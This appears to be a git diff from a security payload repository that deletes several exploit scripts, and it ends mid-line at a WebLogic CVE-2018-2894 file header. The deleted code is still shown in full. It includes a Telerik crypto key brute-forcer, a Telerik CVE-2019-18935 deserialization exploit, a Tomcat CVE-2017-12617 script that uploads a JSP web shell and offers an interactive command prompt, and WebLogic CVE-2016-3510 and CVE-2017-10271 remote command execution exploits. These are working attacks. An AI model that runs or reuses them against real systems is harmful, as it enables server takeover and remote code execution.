'2017.2.503', '2017.2.621', '2017.2.711', - '2017.3.913' - ] - - plaintext1 = 'EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,' - plaintext2_raw1 = 'Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version=' - plaintext2_raw3 = ', Culture=neutral, PublicKeyToken=121fae78165ba3d4' - plaintext3 = ';AllowMultipleSelection,False,3,False' - - if len(args.version) > 0: - versions = [args.version] - - for version in versions: - plaintext2_raw2 = version - plaintext2 = base64.b64encode( - (plaintext2_raw1 + - plaintext2_raw2 + - plaintext2_raw3 - ).encode() - ).decode() - plaintext = plaintext1 + plaintext2 + plaintext3 - plaintext = base64.b64encode( - plaintext.encode() - ).decode() - ciphertext = base64.b64encode( - encrypt( - plaintext, - found - ).encode() - ).decode() - full_url = url_path + params + ciphertext - urls[version] = full_url - - found_valid_version = False - for version in urls: - url = urls[version] - request = requests.Request('GET', url) - request = request.prepare() - response = session.send(request, verify=False, proxies=getProxy(args.proxy)) - if response.status_code == 500: - continue - else: - match = re.search( - "(Error Message:)(.+\n*.+)()", - response.text - ) - if match is None: - print(version + ": " + url) - found_valid_version = True - break - - if not found_valid_version: - print("No valid version found") - -def mode_samples(): - print("Samples for testing decryption and encryption functions:") - print("-d ciphertext key") - print("-e plaintext key") - print("") - print("Key:") - print("DC50EEF37087D124578FD4E205EFACBE0D9C56607ADF522D") - print("") - print("Plaintext:") - print("EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,VGVsZXJpay5XZWIuVUkuRWRpdG9yLkRpYWxvZ0NvbnRyb2xzLkRvY3VtZW50TWFuYWdlckRpYWxvZywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxNi4yLjUwNC40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0;AllowMultipleSelection,False,3,False") - print("") - print("Ciphertext:") - print("FhQAWBwoPl9maHYCJlx8YlZwQDAdYxRBYlgDNSJxFzZ9PUEWVlhgXHhxFipXdWR0HhV3WCECLkl7dmpOIGZnR3h0QCcmYwgHZXMLciMVMnN9AFJ0Z2EDWG4sPCpnZQMtHhRnWx8SFHBuaHZbEQJgAVdwbjwlcxNeVHY9ARgUOj9qF045eXBkSVMWEXFgX2QxHgRjSRESf1htY0BwHWZKTm9kTz8IcAwFZm0HNSNxBC5lA39zVH57Q2EJDndvYUUzCAVFRBw/KmJiZwAOCwB8WGxvciwlcgdaVH0XKiIudz98Ams6UWFjQ3oCPBJ4X0EzHXJwCRURMnVVXX5eJnZkcldgcioecxdeanMLNCAUdz98AWMrV354XHsFCTVjenh1HhdBfhwdLmVUd0BBHWZgc1RgQCoRBikEamY9ARgUOj9qF047eXJ/R3kFIzF4dkYJJnF7WCcCKgVuaGpHJgMHZWxvaikIcR9aUn0LKg0HAzZ/dGMzV3Fgc1QsfXVWAGQ9FXEMRSECEEZTdnpOJgJoRG9wbj8SfClFamBwLiMUFzZiKX8wVgRjQ3oCM3FjX14oIHJ3WCECLkl7dmpOIGZnR3h0QCcmYwgHZXMDMBEXNg9TdXcxVGEDZVVyEixUcUoDHRRNSh8WMUl7dWJfJnl8WHoHbnIgcxNLUlgDNRMELi1SAwAtVgd0WFMGIzVnX3Q3J3FgQwgGMQRjd35CHgJkXG8FbTUWWQNBUwcQNQwAOiRmPmtzY1psfmcVMBNvZUooJy5ZQgkuFENuZ0BBHgFgWG9aVDMlbBdCUgdxMxMELi1SAwAtY35aR20UcS5XZWc3Fi5zQyZ3E0B6c0BgFgBoTmJbUA0ncwMHfmMtJxdzLnRmKG8xUWB8aGIvBi1nSF5xEARBYyYDKmtSeGJWCXQHBmxaDRUhYwxLVX01CyByCHdnEHcUUXBGaHkVBhNjAmh1ExVRWycCCEFiXnptEgJaBmJZVHUeBR96ZlsLJxYGMjJpHFJyYnBGaGQZEhFjZUY+FxZvUScCCEZjXnpeCVtjAWFgSAQhcXBCfn0pCyAvFHZkL3RzeHMHdFNzIBR4A2g+HgZdZyATNmZ6aG5WE3drQ2wFCQEnBD12YVkDLRdzMj9pEl0MYXBGaVUHEi94XGA3HS5aRyAAd0JlXQltEgBnTmEHagAJX3BqY1gtCAwvBzJ/dH8wV3EPA2MZEjVRdV4zJgRjZB8SPl9uA2pHJgMGR2dafjUnBhBBfUw9ARgUOj9qFQR+") - print("") - - -def mode_b64e(): - print(base64.b64encode(args.parameter.encode()).decode()) - print("") - - -def mode_b64d(): - print(base64.b64decode(args.parameter.encode()).decode()) - print("") - -sys.stderr.write( - "\ndp_crypto by Paul Taylor / @bao7uo\nCVE-2017-9248 - " + - "Telerik.Web.UI.dll Cryptographic compromise\n\n" - ) - -p = argparse.ArgumentParser() -subparsers = p.add_subparsers() - -decrypt_parser = subparsers.add_parser('d', help='Decrypt a ciphertext') -decrypt_parser.set_defaults(func=mode_decrypt) -decrypt_parser.add_argument('ciphertext', action='store', type=str, default='', help='Ciphertext to decrypt') -decrypt_parser.add_argument('key', action='store', type=str, default='', help='Key to decrypt') - -encrypt_parser = subparsers.add_parser('e', help='Encrypt a plaintext') -encrypt_parser.set_defaults(func=mode_encrypt) -encrypt_parser.add_argument('plaintext', action='store', type=str, default='', help='Ciphertext to decrypt') -encrypt_parser.add_argument('key', action='store', type=str, default='', help='Key to decrypt') - -brute_parser = subparsers.add_parser('k', help='Bruteforce key/generate URL') -brute_parser.set_defaults(func=mode_brutekey) -brute_parser.add_argument('-u', '--url', action='store', type=str, help='Target URL') -brute_parser.add_argument('-l', '--key-len', action='store', type=int, default=48, help='Len of the key to retrieve, OPTIONAL: default is 48') -brute_parser.add_argument('-o', '--oracle', action='store', type=str, default='Index was outside the bounds of the array.', help='The oracle text to use. OPTIONAL: default value is for english version, other languages may have other error message') -brute_parser.add_argument('-v', '--version', action='store', type=str, default='', help='OPTIONAL. Specify the version to use rather than iterating over all of them') -brute_parser.add_argument('-c', '--charset', action='store', type=str, default='hex', help='Charset used by the key, can use all, hex, or user defined. OPTIONAL: default is hex') -brute_parser.add_argument('-a', '--accuracy', action='store', type=int, default=9, help='Maximum accuracy is out of 64 where 64 is the most accurate, \ - accuracy of 9 will usually suffice for a hex, but 21 or more might be needed when testing all ascii characters. Increase the accuracy argument if no valid version is found. OPTIONAL: default is 9.') -brute_parser.add_argument('-p', '--proxy', action='store', type=str, default='', help='Specify OPTIONAL proxy server, e.g. 127.0.0.1:8080') - -encode_parser = subparsers.add_parser('b', help='Encode parameter to base64') -encode_parser.set_defaults(func=mode_b64e) -encode_parser.add_argument('parameter', action='store', type=str, help='Parameter to encode') - -decode_parser = subparsers.add_parser('p', help='Decode base64 parameter') -decode_parser.set_defaults(func=mode_b64d) -decode_parser.add_argument('parameter', action='store', type=str, help='Parameter to decode') - -args = p.parse_args() - -if len(sys.argv) > 2: - args.func() diff --git a/CVE Exploits/Telerik CVE-2019-18935.py b/CVE Exploits/Telerik CVE-2019-18935.py deleted file mode 100644 index b255351..0000000 --- a/CVE Exploits/Telerik CVE-2019-18935.py +++ /dev/null @@ -1,140 +0,0 @@ -#!/usr/bin/env python3 -# origin : https://github.com/noperator/CVE-2019-18935 -# INSTALL: -# git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935 -# python3 -m venv env -# source env/bin/activate -# pip3 install -r requirements.txt - -# Import encryption routines. -from sys import path -path.insert(1, 'RAU_crypto') -from RAU_crypto import RAUCipher - -from argparse import ArgumentParser -from json import dumps, loads -from os.path import basename, splitext -from pprint import pprint -from requests import post -from requests.packages.urllib3 import disable_warnings -from sys import stderr -from time import time -from urllib3.exceptions import InsecureRequestWarning - -disable_warnings(category=InsecureRequestWarning) - -def send_request(files): - headers = { - 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0', - 'Connection': 'close', - 'Accept-Language': 'en-US,en;q=0.5', - 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Upgrade-Insecure-Requests': '1' - } - response = post(url, files=files, verify=False, headers=headers) - try: - result = loads(response.text) - result['metaData'] = loads(RAUCipher.decrypt(result['metaData'])) - pprint(result) - except: - print(response.text) - -def build_raupostdata(object, type): - return RAUCipher.encrypt(dumps(object)) + '&' + RAUCipher.encrypt(type) - -def upload(): - - # Build rauPostData. - object = { - 'TargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(''), ui_version), - 'TempTargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(temp_target_folder), ui_version), - 'MaxFileSize': 0, - 'TimeToLive': { # These values seem a bit arbitrary, but when they're all set to 0, the payload disappears shortly after being written to disk. - 'Ticks': 1440000000000, - 'Days': 0, - 'Hours': 40, - 'Minutes': 0, - 'Seconds': 0, - 'Milliseconds': 0, - 'TotalDays': 1.6666666666666666, - 'TotalHours': 40, - 'TotalMinutes': 2400, - 'TotalSeconds': 144000, - 'TotalMilliseconds': 144000000 - }, - 'UseApplicationPoolImpersonation': False - } - type = 'Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=' + ui_version + ', Culture=neutral, PublicKeyToken=121fae78165ba3d4' - raupostdata = build_raupostdata(object, type) - - with open(filename_local, 'rb') as f: - payload = f.read() - - metadata = { - 'TotalChunks': 1, - 'ChunkIndex': 0, - 'TotalFileSize': 1, - 'UploadID': filename_remote # Determines remote filename on disk. - } - - # Build multipart form data. - files = { - 'rauPostData': (None, raupostdata), - 'file': (filename_remote, payload, 'application/octet-stream'), - 'fileName': (None, filename_remote), - 'contentType': (None, 'application/octet-stream'), - 'lastModifiedDate': (None, '1970-01-01T00:00:00.000Z'), - 'metadata': (None, dumps(metadata)) - } - - # Send request. - print('[*] Local payload name: ', filename_local, file=stderr) - print('[*] Destination folder: ', temp_target_folder, file=stderr) - print('[*] Remote payload name:', filename_remote, file=stderr) - print(file=stderr) - send_request(files) - -def deserialize(): - - # Build rauPostData. - object = { - 'Path': 'file:///' + temp_target_folder.replace('\\', '/') + '/' + filename_remote - } - type = 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=' + net_version + ', Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' - raupostdata = build_raupostdata(object, type) - - # Build multipart form data. - files = { - 'rauPostData': (None, raupostdata), # Only need this now. - '': '' # One extra input is required for the page to process the request. - } - - # Send request. - print('\n[*] Triggering deserialization for .NET v' + net_version + '...\n', file=stderr) - start = time() - send_request(files) - end = time() - print('\n[*] Response time:', round(end - start, 2), 'seconds', file=stderr) - -if __name__ == '__main__': - parser = ArgumentParser(description='Exploit for CVE-2019-18935, a .NET deserialization vulnerability in Telerik UI for ASP.NET AJAX.') - parser.add_argument('-t', dest='test_upload', action='store_true', help="just test file upload, don't exploit deserialization vuln") - parser.add_argument('-v', dest='ui_version', required=True, help='software version') - parser.add_argument('-n', dest='net_version', default='4.0.0.0', help='.NET version') - parser.add_argument('-p', dest='payload', required=True, help='mixed mode assembly DLL') - parser.add_argument('-f', dest='folder', required=True, help='destination folder on target') - parser.add_argument('-u', dest='url', required=True, help='https:///Telerik.Web.UI.WebResource.axd?type=rau') - args = parser.parse_args() - - temp_target_folder = args.folder.replace('/', '\\') - ui_version = args.ui_version - net_version = args.net_version - filename_local = args.payload - filename_remote = str(time()) + splitext(basename(filename_local))[1] - url = args.url - - upload() - - if not args.test_upload: - deserialize() - diff --git a/CVE Exploits/Tomcat CVE-2017-12617.py b/CVE Exploits/Tomcat CVE-2017-12617.py deleted file mode 100644 index 4b72ffb..0000000 --- a/CVE Exploits/Tomcat CVE-2017-12617.py +++ /dev/null @@ -1,239 +0,0 @@ -#!/usr/bin/python -# From https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/tomcat-cve-2017-12617.py -""" -./cve-2017-12617.py [options] - - -options: - - --u ,--url [::] check target url if it's vulnerable --p,--pwn [::] generate webshell and upload it --l,--list [::] hosts list - - -[+]usage: - - -./cve-2017-12617.py -u http://127.0.0.1 -./cve-2017-12617.py --url http://127.0.0.1 -./cve-2017-12617.py -u http://127.0.0.1 -p pwn -./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn -./cve-2017-12617.py -l hotsts.txt -./cve-2017-12617.py --list hosts.txt -""" -from __future__ import print_function -from builtins import input -from builtins import str -from builtins import object -import requests -import re -import signal -from optparse import OptionParser - - - - - - - - -class bcolors(object): - HEADER = '\033[95m' - OKBLUE = '\033[94m' - OKGREEN = '\033[92m' - WARNING = '\033[93m' - FAIL = '\033[91m' - ENDC = '\033[0m' - BOLD = '\033[1m' - UNDERLINE = '\033[4m' - - - - -banner=""" - - - _______ ________ ___ ___ __ ______ __ ___ __ __ ______ - / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ | - | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / - | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / - | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / - \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ - - - -[@intx0x80] - -""" - - - - - -def signal_handler(signal, frame): - - print ("\033[91m"+"\n[-] Exiting"+"\033[0m") - - exit() - -signal.signal(signal.SIGINT, signal_handler) - - - - -def removetags(tags): - remove = re.compile('<.*?>') - txt = re.sub(remove, '\n', tags) - return txt.replace("\n\n\n","\n") - - -def getContent(url,f): - headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} - re=requests.get(str(url)+"/"+str(f), headers=headers) - return re.content - -def createPayload(url,f): - evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>' - headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} - req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers) - if req.status_code==201: - print("File Created ..") - - -def RCE(url,f): - EVIL="""
""".format(f)+""" - - -
- <%@ page import="java.io.*" %> - <% - String cmd = request.getParameter("cmd"); - String output = ""; - if(cmd != null) { - String s = null; - try { - Process p = Runtime.getRuntime().exec(cmd,null,null); - BufferedReader sI = new BufferedReader(new -InputStreamReader(p.getInputStream())); - while((s = sI.readLine()) != null) { output += s+"
"; } - } catch(IOException e) { e.printStackTrace(); } - } -%> -
<%=output %>
""" - - - - headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} - - req=requests.put(str(url)+f+"/",data=EVIL, headers=headers) - - - -def shell(url,f): - - while True: - headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} - cmd=input("$ ") - payload={'cmd':cmd} - if cmd=="q" or cmd=="Q": - break - - re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers) - re=str(re.content) - t=removetags(re) - print(t) - - - - - -#print bcolors.HEADER+ banner+bcolors.ENDC - -parse=OptionParser( - - -bcolors.HEADER+""" - - - _______ ________ ___ ___ __ ______ __ ___ __ __ ______ - / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ | - | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / - | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / - | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / - \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ - - - - -./cve-2017-12617.py [options] - -options: - --u ,--url [::] check target url if it's vulnerable --p,--pwn [::] generate webshell and upload it --l,--list [::] hosts list - -[+]usage: - -./cve-2017-12617.py -u http://127.0.0.1 -./cve-2017-12617.py --url http://127.0.0.1 -./cve-2017-12617.py -u http://127.0.0.1 -p pwn -./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn -./cve-2017-12617.py -l hotsts.txt -./cve-2017-12617.py --list hosts.txt - - -[@intx0x80] - -"""+bcolors.ENDC - - ) - - -parse.add_option("-u","--url",dest="U",type="string",help="Website Url") -parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it") -parse.add_option("-l","--list",dest="L",type="string",help="hosts File") - -(opt,args)=parse.parse_args() - -if opt.U==None and opt.P==None and opt.L==None: - print(parse.usage) - exit(0) - - - -else: - if opt.U!=None and opt.P==None and opt.L==None: - print(bcolors.OKGREEN+banner+bcolors.ENDC) - url=str(opt.U) - checker="Poc.jsp" - print(bcolors.BOLD +"Poc Filename {}".format(checker)) - createPayload(str(url)+"/",checker) - con=getContent(str(url)+"/",checker) - if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: - print(bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC) - print(bcolors.WARNING+url+"/"+checker+bcolors.ENDC) - - else: - print('Not Vulnerable to CVE-2017-12617 ') - elif opt.P!=None and opt.U!=None and opt.L==None: - print(bcolors.OKGREEN+banner+bcolors.ENDC) - pwn=str(opt.P) - url=str(opt.U) - print("Uploading Webshell .....") - pwn=pwn+".jsp" - RCE(str(url)+"/",pwn) - shell(str(url),pwn) - elif opt.L!=None and opt.P==None and opt.U==None: - print(bcolors.OKGREEN+banner+bcolors.ENDC) - w=str(opt.L) - f=open(w,"r") - print("Scaning hosts in {}".format(w)) - checker="Poc.jsp" - for i in f.readlines(): - i=i.strip("\n") - createPayload(str(i)+"/",checker) - con=getContent(str(i)+"/",checker) - if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: - print(str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m") diff --git a/CVE Exploits/WebLogic CVE-2016-3510.py b/CVE Exploits/WebLogic CVE-2016-3510.py deleted file mode 100644 index 706e0b1..0000000 --- a/CVE Exploits/WebLogic CVE-2016-3510.py +++ /dev/null @@ -1,72 +0,0 @@ -#!/usr/bin/env python2 - -#Oracle WebLogic Server Java Object Deserialization RCE (CVE-2016-3510) -#Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits) -#Made with <3 by @byt3bl33d3r - -from __future__ import print_function -import socket -import struct -import argparse -import os -import sys -from subprocess import check_output - -ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar'] -ysoserial_path = None - -parser = argparse.ArgumentParser() -parser.add_argument('target', type=str, help='Target IP:PORT') -parser.add_argument('command', type=str, help='Command to run on target') -parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)') - -if len(sys.argv) < 2: - parser.print_help() - sys.exit(1) - -args = parser.parse_args() - -if not args.ysoserial_path: - for path in ysoserial_default_paths: - if os.path.exists(path): - ysoserial_path = path -else: - if os.path.exists(args.ysoserial_path): - ysoserial_path = args.ysoserial_path - -if len(args.target.split(':')) != 2: - print('[-] Target must be in format IP:PORT') - sys.exit(1) - -if not args.command: - print('[-] You must specify a command to run') - sys.exit(1) - -ip, port = args.target.split(':') - -sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - -print('[*] Target IP: {}'.format(ip)) -print('[*] Target PORT: {}'.format(port)) - -sock.connect((ip, int(port))) - -# Send headers -headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' -print('[*] Sending header') -sock.sendall(headers) - -data = sock.recv(1024) -print('[*] Received: "{}"'.format(data)) - -payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) - -payload = '\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' -payload += payloadObj -payload += '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' - -# adjust header for appropriate message length -payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) - -print('[*] Sending payload') -sock.send(payload) diff --git a/CVE Exploits/WebLogic CVE-2017-10271.py b/CVE Exploits/WebLogic CVE-2017-10271.py deleted file mode 100644 index 71236dd..0000000 --- a/CVE Exploits/WebLogic CVE-2017-10271.py +++ /dev/null @@ -1,63 +0,0 @@ -from __future__ import print_function -from builtins import input -import requests -import sys - -url_in = sys.argv[1] -payload_url = url_in + "/wls-wsat/CoordinatorPortType" -payload_header = {'content-type': 'text/xml'} - - -def payload_command (command_in): - html_escape_table = { - "&": "&", - '"': """, - "'": "'", - ">": ">", - "<": "<", - } - command_filtered = ""+"".join(html_escape_table.get(c, c) for c in command_in)+"" - payload_1 = " \n" \ - " " \ - " \n" \ - " \n" \ - " \n" \ - " " \ - " " \ - " cmd " \ - " " \ - " " \ - " /c " \ - " " \ - " " \ - + command_filtered + \ - " " \ - " " \ - " " \ - " " \ - " " \ - " " \ - " " \ - " " \ - "" - return payload_1 - -def do_post(command_in): - result = requests.post(payload_url, payload_command(command_in ),headers = payload_header) - - if result.status_code == 500: - print("Command Executed \n") - else: - print("Something Went Wrong \n") - - - -print("***************************************************** \n" \ - "**************** Coded By 1337g ****************** \n" \ - "* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \ - "***************************************************** \n") - -while 1: - command_in = input("Eneter your command here: ") - if command_in == "exit" : exit(0) - do_post(command_in) diff --git a/CVE Exploits/WebLogic CVE-2018-2894.py b/CVE Exploits/WebLogic CVE-2018-2894.py deleted file mode 100644 index 18adab0..0000000 --- a/CVE 